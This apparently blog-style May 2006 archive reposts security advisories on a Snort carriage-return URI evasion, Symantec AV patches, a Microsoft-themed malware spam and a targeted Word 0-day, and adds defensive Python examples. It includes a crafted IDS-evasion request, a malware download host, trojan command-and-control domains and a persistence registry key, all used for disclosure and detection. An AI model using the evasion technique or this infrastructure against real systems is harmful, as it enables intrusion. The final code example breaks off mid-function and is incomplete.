May 2006 - Posts

Snort bypass vulnerability

Published: 2006-05-31,
Last Updated: 2006-05-31 19:21:02 UTC by Jason Lam (Version: 1)

Demarc has just released a vulnerability alert on Snort. The vulnerability allows evasion of URI content rules: when a carriage return is added to the end of a URL (before the HTTP protocol declaration), Snort's detection can be evaded. According to the alert, this affects thousands of detection rules in the standard rule base. Thanks to Ben McDougall for reporting this to us.

Please refer to the vulnerability alert for more details:
http://www.demarc.com/support/downloads/patch_20060531

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
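To see why a stray carriage return matters, here is an added example (mine, not Demarc's alert and not Snort's code): a simplified model of the parser mismatch the alert describes. The IDS-side parser assumes the request line ends at the first CR, so the evasion request looks malformed and no URI is ever extracted for the rule to inspect; the server-side parser tokenizes on any ASCII whitespace, skips the CR, and serves the path. Both parsers, the rule string and the two requests are constructed for illustration; Snort's actual http_inspect logic and the behaviour of any particular web server are assumptions to verify against the alert and against your own server.

```python
import re

# Constructed rule: the IDS should alert whenever the request URI contains this.
URICONTENT = b"/cgi-bin/evil.cgi"

# Constructed requests. EVASION carries a bare CR after the path, before the
# HTTP version, which is the shape the Demarc alert describes.
NORMAL = b"GET /cgi-bin/evil.cgi HTTP/1.0\r\nHost: victim\r\n\r\n"
EVASION = b"GET /cgi-bin/evil.cgi\r HTTP/1.0\r\nHost: victim\r\n\r\n"


def ids_request_uri(request: bytes):
    """Illustrative IDS-side parser, NOT Snort's http_inspect code.

    The request line is taken to end at the first CR or LF. A bare CR inside
    the line therefore truncates it to 'GET /cgi-bin/evil.cgi', which no
    longer has three space-separated fields, so no URI is extracted and a
    uricontent-style rule has nothing to inspect.
    """
    line = re.split(rb"[\r\n]", request, maxsplit=1)[0]
    fields = line.split(b" ")
    if len(fields) != 3 or not fields[2].startswith(b"HTTP/"):
        return None
    return fields[1]


def server_request_uri(request: bytes):
    """Illustrative server-side parser (assumption: a server that tokenizes the
    request line on any ASCII whitespace, as an isspace()-based parser does).

    The line ends at CRLF and the stray CR is skipped like a space, so the
    server serves exactly the path the rule was written for.
    """
    line = request.split(b"\r\n", 1)[0]
    fields = line.split()  # bytes.split() splits on all ASCII whitespace, CR included
    if len(fields) != 3:
        return None
    return fields[1]


def hardened_ids_request_uri(request: bytes):
    """Detector that tokenizes the way the server does and never silently drops
    a request it cannot parse: a CR that is not part of CRLF is reported as an
    anomaly marker so a rule can fire on it instead of seeing nothing."""
    line = request.split(b"\r\n", 1)[0]
    if b"\r" in line:
        return b"<malformed-request-line>"
    fields = line.split()
    if len(fields) != 3:
        return b"<malformed-request-line>"
    return fields[1]


def rule_fires(uri):
    # Alert on the watched URI, and also on a request line the parser rejected.
    return uri is not None and (URICONTENT in uri or uri.startswith(b"<malformed"))


def evasion_succeeds(request: bytes, ids_parser=ids_request_uri) -> bool:
    """True when the server would serve the watched path while the IDS stays silent."""
    served = server_request_uri(request)
    return served is not None and URICONTENT in served and not rule_fires(ids_parser(request))


if __name__ == "__main__":
    for name, req in (("normal", NORMAL), ("evasion", EVASION)):
        print(name, "ids:", ids_request_uri(req), "server:", server_request_uri(req),
              "evaded:", evasion_succeeds(req),
              "evaded(hardened):", evasion_succeeds(req, hardened_ids_request_uri))
```

The general lesson is the one a practitioner wants from this alert: an IDS must tokenize the protocol the way the protected server does, and any request it cannot parse should be surfaced as an anomaly rather than passed without inspection.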

This is really nice, wait for the patch for the Word 0-day to be released next patch cycle, or PAY to get the patch now with Windows Live OneCare.  Talk about extortion…
Windows Live OneCare available now
Posted by woody on 31 May 2006 - 07:19:05
Windows Patches/Security
Tell me if this burns you up.

Microsoft just announced that the long-anticipated anti-virus/anti-everything service, Windows Live OneCare is now available for purchase. It's, uh, Live.

The very first item on OneCare's main page? The Word 0day security hole I wrote about almost two weeks ago. Microsoft calls it "Exploit:Win32/Wordjmp" and identifies it as a "moderate" risk.

So let me see if I understand this. Microsoft doesn't have the security patch for this particular hole ready. They may or may not release the patch on June's Patch Tuesday.

But Microsoft will sell you protection, if you buy Windows Live OneCare, today.

As John Dvorak wrote in his PC Mag column last October:

Does Microsoft think it is going to get away with charging real money for any sort of add-on, service, or new product that protects clients against flaws in its own operating system? Does the existence of this not constitute an incredible conflict of interest? Why improve the base code when you can sell "protection"? Is Frank Nitti the new CEO?

'Tis a crazy world we live in....

Woody’s no-bull news, tips and help for Windows and Office..

More on Symantec vulnerabilities

Published: 2006-05-31,
Last Updated: 2006-05-31 01:21:02 UTC by Bojan Zdrnja (Version: 1)

The latest patches from Symantec are causing quite a bit of confusion. To reiterate what Kevin wrote in his diary (http://isc.sans.org/diary.php?storyid=1368):

*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.

Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):

Symantec Antivirus Corporate Edition
10.1.0.394 -> 10.1.0.396 (there's a typo here on their web, it's not version 3)
10.1.0.400 -> 10.1.0.401
10.0.2.2010 -> 10.0.2.2011
10.0.2.2020 -> 10.0.2.2021

Symantec Client Security
3.1.0.394 -> 3.1.0.396
3.1.0.400 -> 3.1.0.401
3.0.2.2010 -> 3.0.2.2011
3.0.2.2020 -> 3.0.2.2021

Now, if you are running *ANY* other affected version, you will first have to upgrade to one of the versions that have a patch out and then install the patch. I hope this clears up the confusion.

There seem to be some mitigations to the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, has the service Rtvscan.exe listening on TCP port 2967. If your host-based firewall is configured to block access to this port (which effectively means that you can't manage the client from the centralized server, at least not until the client connects to it) you should be OK.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners, so it looks safe, at least from a remote exploit over the network (patch in any case!).

If we get more information we'll update the diary. Thanks to Gary for help with this.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
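As an added triage helper (mine, not Symantec's or the ISC's), the script below applies the build table from the diary above: it classifies a reported product and version as not affected, already patched, patchable now, or needing an upgrade to a patchable build first, and it parses Windows netstat -an output to tell whether anything is listening on TCP 2967. The netstat text is constructed, and the product labels SAV CE and SCS are my shorthand for Symantec Antivirus Corporate Edition and Symantec Client Security.

```python
import re

# Patchable build -> patched build, as listed in the diary above.
PATCH_MAP = {
    "SAV CE": {
        "10.1.0.394": "10.1.0.396",
        "10.1.0.400": "10.1.0.401",
        "10.0.2.2010": "10.0.2.2011",
        "10.0.2.2020": "10.0.2.2021",
    },
    "SCS": {
        "3.1.0.394": "3.1.0.396",
        "3.1.0.400": "3.1.0.401",
        "3.0.2.2010": "3.0.2.2011",
        "3.0.2.2020": "3.0.2.2021",
    },
}
# Release lines reported as affected ("all builds") and, for SAV CE, the
# lines the diary reports as OK.
AFFECTED = {"SAV CE": {(10, 0), (10, 1)}, "SCS": {(3, 0), (3, 1)}}
UNAFFECTED_MAJORS = {"SAV CE": {8, 9}, "SCS": set()}
RTVSCAN_PORT = 2967


def parse_version(version: str):
    parts = version.strip().split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        raise ValueError("bad version string: %r" % version)
    return tuple(int(p) for p in parts)


def triage(product: str, version: str):
    """Return (status, build). status is one of 'not-affected', 'patched',
    'apply-patch', 'upgrade-then-patch', 'unknown'; build is the patched build
    to install, or the patchable build to move to first."""
    if product not in PATCH_MAP:
        raise ValueError("unknown product %r" % product)
    v = parse_version(version)
    table = PATCH_MAP[product]
    if version in table.values():
        return "patched", None
    if version in table:
        return "apply-patch", table[version]
    if v[:2] in AFFECTED[product]:
        # Any other build on an affected line: go to the newest patchable
        # build of that line, then apply its patch.
        candidates = [b for b in table if parse_version(b)[:2] == v[:2]]
        return "upgrade-then-patch", max(candidates, key=parse_version)
    if v[0] in UNAFFECTED_MAJORS[product]:
        return "not-affected", None
    return "unknown", None


# Windows 'netstat -an' listener line, e.g.
#   TCP    0.0.0.0:2967           0.0.0.0:0              LISTENING
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$", re.IGNORECASE)


def rtvscan_exposed(netstat_an_output: str, port: int = RTVSCAN_PORT):
    """Local addresses on which something listens on `port`. An empty list is
    what the diary observed on an unmanaged install."""
    exposed = []
    for line in netstat_an_output.splitlines():
        m = NETSTAT_RE.match(line)
        if m and int(m.group(2)) == port:
            exposed.append(m.group(1))
    return exposed


# Constructed netstat output for a managed and an unmanaged client.
MANAGED_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2967           0.0.0.0:0              LISTENING
  TCP    10.0.0.5:139           0.0.0.0:0              LISTENING
"""
UNMANAGED_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    10.0.0.6:139           0.0.0.0:0              LISTENING
"""

if __name__ == "__main__":
    for prod, ver in (("SAV CE", "10.1.0.394"), ("SAV CE", "10.0.1.1000"),
                      ("SAV CE", "9.0.5.1000"), ("SCS", "3.1.1.0")):
        print(prod, ver, "->", triage(prod, ver))
    print("managed 2967 listeners:", rtvscan_exposed(MANAGED_NETSTAT))
    print("unmanaged 2967 listeners:", rtvscan_exposed(UNMANAGED_NETSTAT))
```

A version on an affected line that is not in the table is the case the diary warns about: the answer is not "no patch available" but "upgrade to a patchable build first".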

Symantec AV Vulnerability Latest

Published: 2006-05-29,
Last Updated: 2006-05-29 21:21:41 UTC by Kevin Liston (Version: 2)

Symantec has updated their advisory (http://www.symantec.com/avcenter/security/Content/2006.05.25.html)

They confirm that the following versions are affected:
Symantec Client Security
   3.0 all builds
   3.1 all builds

Symantec Antivirus Corporate Edition
   10.0 all builds
   10.1 all builds


The following patches are available:
Symantec Client Security
   3.0 Builds 3.0.2.2010 and 3.0.2.2020
   3.1 Builds 3.1.0.394 and 3.1.0.400

Symantec Antivirus Corporate Edition
   10.0 Builds 10.0.2.2010 and 10.0.2.2020
   10.1 Builds 10.1.0.394 and 10.1.0.400

Symantec recommends that you upgrade to a "patchable" version.  This may be bad news for some organizations.

Some have reported that the patching process is not trivial, and can be difficult to roll out in some environments.

At this time, there have been no reports of proof-of-concept or exploit code other than that held privately by eEye.

We have not received any reports of exploitation in the wild.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Link to 'a new Microsoft patch' being spammed

Published: 2006-05-30,
Last Updated: 2006-05-30 02:19:26 UTC by Bojan Zdrnja (Version: 1)

We've received samples of an e-mail which is being actively spammed at the moment. The e-mail purports to be from Microsoft and it is notifying the recipient of "a new vulnerability [that] has been discovered in the Microsoft WinLogon Service". It further states that the vulnerability can allow an attacker access to the unpatched system.

Of course, the user is advised to install the patch which can be downloaded from the included link.

As the e-mail body is an HTML message, the displayed link (http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe) is not where the user will really be sent:

http:// www.redcallao.com/ [REMOVED] / winlogon_patchV1.12.exe

At the time this diary was written, the site was still up and serving malware. AV detection, although better than the first time we tried it, is still pretty bad. Only 8 products on VirusTotal detected this:

Engine      Version     Updated     Result
AntiVir     6.34.1.34   05.29.2006  Heuristic/Crypted.Modified
BitDefender 7.2         05.30.2006  Trojan.BeastPWS.C
Kaspersky   4.0.2.24    05.30.2006  Trojan-Spy.Win32.Delf.jq
NOD32v2     1.1566      05.30.2006  Win32/Spy.Delf.NBR
Panda       9.0.0.4     05.29.2006  Suspicious file
Sophos      4.05.0      05.30.2006  Troj/BeastPWS-C
Symantec    8.0         05.30.2006  Infostealer

Does all this sound familiar? Sure, it's (almost) the same story that the Swen worm (or Gibe.F) tried to "sell" to the users. Hopefully this one will not come close to doing what Swen did.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
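An added example (mine, not part of the diary) of the check that catches this kind of lure: parse the HTML, and for every anchor whose visible text is itself a URL, compare the host the user sees with the host in the href, also flagging any link that fetches an executable. The message below is constructed from the diary's two URLs, with the redacted path left as REMOVED.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the spam: the displayed text says
# microsoft.com, the href points at the spammer's host. The real path was
# redacted in the diary and stays REMOVED here.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>A new vulnerability has been discovered in the Microsoft WinLogon Service.</p>
<p>Download the patch: <a href="http://www.redcallao.com/REMOVED/winlogon_patchV1.12.exe">
http://www.microsoft.com/patches-win-logon-critical/winlogon_patchV1.12.exe</a></p>
<p>More information: <a href="http://www.microsoft.com/security">http://www.microsoft.com/security</a></p>
<p><a href="http://www.example.com/unsubscribe">Unsubscribe</a></p>
</body></html>
"""

URL_LIKE = re.compile(r"^(?:https?://|www\.)", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "a" and self._href is not None:
            # collapse the whitespace HTML rendering would collapse
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def find_deceptive_links(html: str):
    """Return [(href, visible_text, [reasons])] for links worth blocking or
    flagging: visible URL host differs from the href host, or the href
    downloads an executable."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        reasons = []
        if URL_LIKE.match(text) and host_of(text) != host_of(href):
            reasons.append("displayed host %s != real host %s" % (host_of(text), host_of(href)))
        if urlparse(href).path.lower().endswith(EXECUTABLE_EXT):
            reasons.append("link fetches an executable")
        if reasons:
            findings.append((href, text, reasons))
    return findings


if __name__ == "__main__":
    for href, text, reasons in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(href, "|", text, "|", "; ".join(reasons))
```

The host comparison alone is enough for the sample above; the executable check is there because a genuine vendor link whose text and href agree can still be a download you do not want arriving by mail.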

Security Response has published a removal tool to clean infections of W32.Mytob.PP@mm. Version 1.38 of the tool can be obtained by visiting:

http://www.symantec.com/avcenter/venc/data/w32.mytob@mm.removal.tool.html

Cogent Routing Outages

Published: 2006-05-24,
Last Updated: 2006-05-24 11:55:40 UTC by Johannes Ullrich (Version: 2)

This morning (shortly after 9am UTC, 5am EDT), Cogent experienced an outage that left many sites unreachable. Things are slowly coming back together; some sites may still not be reachable.

Keynote shows issues between Cogent and almost all of its peers, as well as some isolated issues with Savvis.
http://scoreboard.keynote.com/scoreboard/Main.aspx?Login=Y&Username=public&Password=public

Note: Cogent's URL is 'cogentco.com', NOT 'cogent.com'.

[Keynote screenshot as of 07:50 EDT (11:50 UTC)]

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Gee, I wonder how this happened??  Rest of the article is at the link below.


Halliburton, Bechtel could be factors in border security plan

By Mike Sunnucks
The Business Journal of Phoenix
Updated: 7:00 p.m. ET May 21, 2006

Two big and controversial corporate names -- Halliburton and Bechtel -- could benefit from mammoth increases in federal spending on border security.

Federal and state efforts to bolster porous border security include plans for increased security infrastructure, expanded use of technology, including radar. Other plans include construction of more prison beds, and additional law enforcement operations, security roads and improved employment verification systems and ports of entry.

That will mean billions of dollars in border-related contract opportunities for defense, technology and other government contractors. A substantial number of border security contracts are expected to go to major contractors -- including big infrastructure, construction and contract management experts such as Halliburton Co. and Bechtel Corp.

"It's the big boys that will benefit from this," said Congressman Ed Pastor, a Phoenix Democrat. "Most of the big contracts are going to go out to the Halliburtons and Bechtels."

Those two companies are well-known for being politically connected and have received top infrastructure, energy and construction management contracts in Iraq. They also have critics who worry about their political ties to the Bush administration and Washington, D.C., power brokers.

Houston-based Halliburton formerly was headed by Vice President Dick Cheney, and its subsidiary KBR (Kellogg Brown & Root) constructed the post-9/11 terrorist jail cells at the U.S. Naval Base at Guantanamo Bay, Cuba. KBR already won one contract to build more prison facilities to help with border enforcement.

Those two companies specialize in large infrastructure and construction-related contracts. Various border security plans call for construction of security fences and walls, new roads and equipment for the resource-challenged U.S. Border Patrol, technology surveillance applications and more law enforcement offices, checkpoints and jail cells to house illegal migrants caught crossing the border as well as drug traffickers and other smugglers.

Pastor said large contractors often get awarded comprehensive federal contracts when there is a rush to get quick movement on a matter. Those contractors then can dole out subcontracts to specialty firms and subcontractors.

Halliburton, Bechtel could be factors in border security plan - Top Stories - MSNBC.com.

Update on Word 0-Day Issue

Published: 2006-05-23,
Last Updated: 2006-05-23 12:19:28 UTC by David Goldsmith (Version: 1)

Microsoft and eEye have each released advisories related to the issue this evening.

Microsoft's security advisory can be found here.

eEye's advisory can be found here.

The information about which versions are vulnerable differs a little between the two advisories.

Microsoft says the vulnerability only affects Word 2002/XP and Word 2003 and that Word 2000 is not vulnerable. The Microsoft advisory contains information on workarounds including not using Word as the default mail editor in Outlook and running Word in 'Safe Mode' to disable the functionality that is affected by the vulnerability and exploit.

eEye says that the vulnerability affects Word 2000 as well.  The eEye advisory mentions that they believe there are two variants of this exploit.  Thus, it may be that the first variant only affects Word 2002/XP and 2003 and the second variant affects all three versions.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

********************************************************************
Title: Microsoft Security Advisory Notification
Issued: May 22, 2006
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (919637)
  - Title: Vulnerability in Word Could Allow Remote Code Execution
  - http://www.microsoft.com/technet/security/advisory/919637.mspx
  - Revision Note: Advisory Published: May 22, 2006   

********************************************************************

Targeted attack: experience from the trenches

Published: 2006-05-21,
Last Updated: 2006-05-21 18:32:42 UTC by Swa Frantzen (Version: 3)

Learn

Learning lessons from incidents is a very important part of incident handling. Yet with targeted attacks it is very hard, as you need to have a case before you can learn. So learning from others is even more important here.

Michael reported on an unnamed organization being hit by a limited, extremely targeted attack.

Detection is usually the hardest part of these attacks. This case seems to have been detected by a very alert user who noticed a domain name in an email that wasn't completely right.

That user noticed an incoming email that originated from a domain which looked like their own but wasn't (it actually only had an MX record in it). The email was written to look like an internal email, including the signature. It was addressed by name to the intended victim and was not detected by the anti-virus software.

FUD ?

In reaction to this report we've seen people react as if it were a widespread thing. We need to stress that this is not the case. This kind of attack is new, and so must the response be.

The group originating these attacks does so in a very targeted fashion. The document is crafted to target a specific organization, containing specific elements that deal with just that one organization. If you don't work for them, you are very unlikely to ever see this. Proof of how rare it is: the number of requests for samples we got from companies like anti-virus vendors.

Chances are very high that you are not targeted, at least not by this exploit. So far there is one group doing (at least) one very targeted attack with this. Either they would need to change their method of operation to do widespread attacks, or some other group would need to get a sample, reverse engineer it, find the core of the exploit, modify it to work in a wider fashion and launch a new attack.

So do you need to dig in now? Most likely not; we suggest you act as you would for any new vulnerability where the details are still very well hidden.

  • The one organization being targeted needs specific actions.
  • If you are on the potential target list, you need to learn to defend against the unknown, not against this particular threat.
  • If you're not on their target list, chances are you will not see an exploit until Microsoft releases a patch and attackers can derive the knowledge to exploit it from that.

Panicking and blindly taking action is probably the worst course of action you can take.

Report

To say it in Michael's words:

"Emails were sent to specific individuals within the organization that contained a Microsoft Word attachment. This attachment, when opened, exploited a previously-unknown vulnerability in Microsoft Word (verified against a fully-patched system).  The exploit functioned as a dropper, extracting a trojan byte-for-byte from the host file when executed.  After extracting and launching the trojan, the exploit then overwrote the original Word document with a "clean" (not infected) copy from payload in the original infected document.  As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file.  If the user agrees, the new "clean" file is opened without incident." They are working with Microsoft on this.

"We are still analyzing the trojan dropped by the exploit.  What we do know is that it communicates back to localhosts[dot]3322[dot]org via HTTP.  It is proxy-aware, and "pings" this server using HTTP POSTs of 0 bytes (no data actually POSTed) with a periodicity of approximately one minute.  It has rootkit-like functionality, hiding binary files associated with the exploit (all files on the system named winguis.dll will not be shown in Explorer, etc.), and invokes itself automatically by including the trojan binary in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows".  Note that, as of this morning, no anti-virus signatures detected this file as problematic according to virustotal.com.

We have traced nearly this attack to the far east; specifically, China and Taiwan.  IPs seen are registered there, domains seen are registered there, and the emails received originated from a server in that region.  The attackers appear to be aware that they have been "outed", and have been routinely changing the IP address associated with the URL above.

Due to the aggravating circumstances (0-day, no AV detection), we wanted to make sure the community is aware that this problem exists as soon as possible."

More information:

Many thanks to all handlers active on this: Johannes, Chris, William, Adrien.

--
Swa Frantzen - Section 66
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
3322, 8866 and others

Posted by Mikko @ 21:02 GMT

There's been quite a lot of buzz about the new 0-day Word vulnerability.

While talking about details of the vulnerability, it's easy to forget what the vulnerability was actually used for.

According to the information we have, a US-based company was targeted with emails that were sent to the company from the outside but were spoofed to look like internal emails.

The emails contained a Word DOC file as an attachment. DOCs are a nasty attack vector. A few years ago, when macro viruses were the number one problem, many companies were not allowing native DOC files through their email gateways. Now that has changed, and DOCs typically get through just fine. But Word has vulnerabilities, and users typically don't install Word patches nearly as well as Windows patches.

When run, the exploit file ran a backdoor, hid it with a rootkit and allowed unrestricted access to the machine for the attackers, operating from a host registered under the Chinese 3322.org domain.

3322.org is a free host bouncing service in China. Anybody can register any host name under 3322.org (like whatever.3322.org) and the service will point that hostname to any IP address you want. There's actually a series of such services, including 8866.org, 2288.org, 6600.org, 7700.org, 8800.org and 9966.org. There are tons of useful things you can do with such host-resolving service. And tons of bad things too.

Now, we've seen these kinds of attack before.

In March 2005, somebody was sending out dozens of emails to US government email addresses, spoofed to be from Washington Post. The email content talked about "international IPR conventions China has acceded to". The attached DOC file dropped a backdoor that connected to a host under 8866.org.

In September 2005, somebody sent several batches of EU-themed emails to addresses at the EU Parliament. Email topics included "Parliamentary Assembly", "Assembly of Council of Europe" and "Parliamentary Assembly Declaration". Emails contained a DOC that connected to a host under 3322.org.

In March 2006, a big European company received emails that were spoofed to look like internal job applications. The attached DOC file dropped a backdoor that connected to a host under 3322.org.

In April 2006, another European company was targeted by a similar attack, this time connecting to a host under 8866.org.

And now in May 2006, this latest case complete with a zero-day exploit, connecting to a host under 3322.org.

So, should you block access to hosts under 3322.org, 8866.org and others? Depends. It's kind of like blocking access to Geocities: you'd block lots of bad stuff - and lots of good stuff. But then again, most users of these services are in China. If you're not in China and your users are not supposed to access different Chinese services, blocking might not break too many things.

We'd recommend that you at least check your company's gateway logs to see what kind of traffic you have to such services.

F-Secure : News from the Lab - May of 2006.
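As an added example, not from the post above: a scan of proxy logs for the dynamic-DNS suffixes it lists, matching on whole domain labels so that 3322.org.example.com and evil3322.org are not counted, plus a simple beacon heuristic drawn from the roughly one-minute HTTP POST check-ins described in the targeted-attack report on this page. The log lines are constructed in Squid's native access.log format, and the periodicity thresholds are my choice.

```python
from statistics import median
from urllib.parse import urlparse

# Dynamic-DNS suffixes named in the post above. Extend as your own logs warrant.
WATCH_SUFFIXES = ("3322.org", "8866.org", "2288.org", "6600.org",
                  "7700.org", "8800.org", "9966.org")

# Constructed Squid native access.log lines:
#   time elapsed client code/status bytes method URL user hierarchy/peer type
SAMPLE_LOG = """\
1148371200.101    120 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.10 text/html
1148371210.551     90 10.1.2.5 TCP_MISS/200 5120 GET http://www.3322.org.example.com/index.html - DIRECT/198.51.100.7 text/html
1148371261.202    118 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.10 text/html
1148371300.004     40 10.1.2.4 TCP_MISS/200 2200 GET http://mirror.8866.org/update.txt - DIRECT/203.0.113.20 text/plain
1148371320.303    121 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.10 text/html
1148371382.404    119 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.11 text/html
1148371440.505    117 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.11 text/html
1148371499.606    122 10.1.2.3 TCP_MISS/200 312 POST http://localhosts.3322.org/ - DIRECT/203.0.113.11 text/html
1148371500.700     30 10.1.2.3 TCP_HIT/200 9000 GET http://www.example.com/ - NONE/- text/html
"""


def under_watched_suffix(host: str):
    """Return the matching suffix, matching on label boundaries only."""
    host = host.lower().rstrip(".")
    for suffix in WATCH_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return None


def parse_squid_line(line: str):
    fields = line.split()
    if len(fields) < 7:
        return None
    try:
        ts = float(fields[0])
    except ValueError:
        return None
    host = (urlparse(fields[6]).hostname or "").lower()
    return {"ts": ts, "client": fields[2], "method": fields[5], "host": host}


def looks_like_beacon(times, min_hits=5, tolerance=0.25):
    """Regular check-ins: at least min_hits requests whose gaps all stay within
    `tolerance` of the median gap. Returns (is_beacon, median_gap_seconds)."""
    if len(times) < min_hits:
        return False, None
    t = sorted(times)
    gaps = [b - a for a, b in zip(t, t[1:])]
    m = median(gaps)
    if m <= 0:
        return False, m
    return all(abs(g - m) <= tolerance * m for g in gaps), m


def scan(log_text: str):
    """Group watched-suffix traffic by (client, host) and score each pair."""
    per_pair = {}
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None:
            continue
        suffix = under_watched_suffix(rec["host"])
        if suffix is None:
            continue
        entry = per_pair.setdefault((rec["client"], rec["host"]),
                                    {"suffix": suffix, "times": [], "methods": set()})
        entry["times"].append(rec["ts"])
        entry["methods"].add(rec["method"])
    report = {}
    for key, entry in per_pair.items():
        beacon, gap = looks_like_beacon(entry["times"])
        report[key] = {"suffix": entry["suffix"], "count": len(entry["times"]),
                       "methods": sorted(entry["methods"]), "beacon": beacon,
                       "median_gap_s": gap}
    return report


if __name__ == "__main__":
    for (client, host), info in sorted(scan(SAMPLE_LOG).items()):
        print(client, host, info)
```

A single hit on a watched suffix is a lead to look at; a client that POSTs to one such host every minute is the pattern the report on this page describes and deserves immediate attention.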


A quick check-in on the Word vulnerability

Hi everyone, Stephen Toulouse here again.  I wanted to catch you up on where we’re at with our investigation of the Word vulnerability.

First off on the vulnerability itself: I want to reiterate we’re hard at work on an update.  The attack vector here is Word documents attached to an email or otherwise delivered to a user’s computer.  The user would have to open it first for anything to happen.  That information isn’t meant to say the issue isn’t serious, it’s just meant to clearly denote the scope of the threat.

Now, we’ve received singular reports of attacks and have been working directly with the couple of customers thus far affected.  In analyzing the malware we’ve added detection to the Windows Live Safety Center, and we’ve passed all that information over to our antivirus partners.  But in breaking down the current malware we discovered some commonality to the current attack.  The attack we’ve seen is email based.  The emails tend to arrive in groups, they often have fake domains that are similar to real domains of the targets, but the targets are valid email addresses.

Currently two of the subject lines we have seen are:

Notice
RE Plan for final agreement

The attack we have seen so far requires admin rights, so limitations on user accounts can help here.  I want to repeat that customers who believe they are affected can contact Product Support Services.  You can contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location:

http://support.microsoft.com/security.

So far, this is a *very* limited attack, and most of our antivirus partners are rating this as “low”.  But we’re working to investigate any variants we might see to make sure detection is out there, as well as working on the update to address the vulnerability.

S.

PS: Michael Howard recently wrote a great article for not running as admin.  It can be found here:  http://msdn.microsoft.com/security/securecode/columns/default.aspx?pull=/library/en-us/dncode/html/secure01182005.asp

*This posting is provided "AS IS" with no warranties, and confers no rights.*

Published Saturday, May 20, 2006 9:03 PM by stepto

Welcome to the Microsoft Security Response Center Blog! : A quick check-in on the Word vulnerability.

Microsoft Word Vulnerability

Published: 2006-05-20,
Last Updated: 2006-05-21 02:05:23 UTC by Koon Tan (Version: 1)

Most anti-virus vendors have already come out with signatures to detect the malware exploiting the MS Word vulnerability. By now, I hope you have got all your AV signatures updated. Although relying on a virus scanner is not foolproof (especially against new variants), it is better than nothing (remember defense-in-depth).

At your firewall and IDS, you may want to monitor outbound traffic going to these domains, as this may be an indication of compromised hosts:

3322.org
scfzf.xicp.net

If you are filtering Word attachments at your gateway, the filter should be based on the Word file type (the content) and not just on the file extension.

US-CERT has released a security alert on the Microsoft Word vulnerability.

Below are stories from ISC on this topic. We will update as we have more detailed information.

Word 0-day, recommended defenses

Targeted attack: Word exploit
- More AV vendor links have been added.

Targeted attack: experience from the trenches

(Update)
Microsoft has put up a new article, A quick check-in on the Word vulnerability (thanks Juha-Matti). The full post is reproduced above on this page.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.
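The diary's advice to filter on file type rather than extension, as an added example (mine, not the ISC's): an OLE2 compound-document header identifies a binary Word file whatever its name, so a gateway that sniffs the content quarantines a renamed .doc and does not act on a text file that merely carries a .doc extension. The sample bytes are constructed. The signature check covers every binary Office container, not only Word; narrowing it to Word would mean parsing the OLE directory for the WordDocument stream, which this example does not do.

```python
import os

# Header of an OLE2 / Compound File Binary container: what a binary .doc
# (and .xls, .ppt, .msi) starts with, whatever the file is called.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
RTF_MAGIC = b"{\\rtf"
WORD_EXTENSIONS = {".doc", ".dot"}

# Constructed stand-in for a binary Word document: correct signature, then
# zero padding. A real file carries a full OLE directory after the header.
WORD_DOC_BYTES = OLE2_MAGIC + b"\x00" * 504
RTF_BYTES = b"{\\rtf1\\ansi\\deff0 {\\fonttbl {\\f0 Times;}} Hello.}"


def sniff(data: bytes) -> str:
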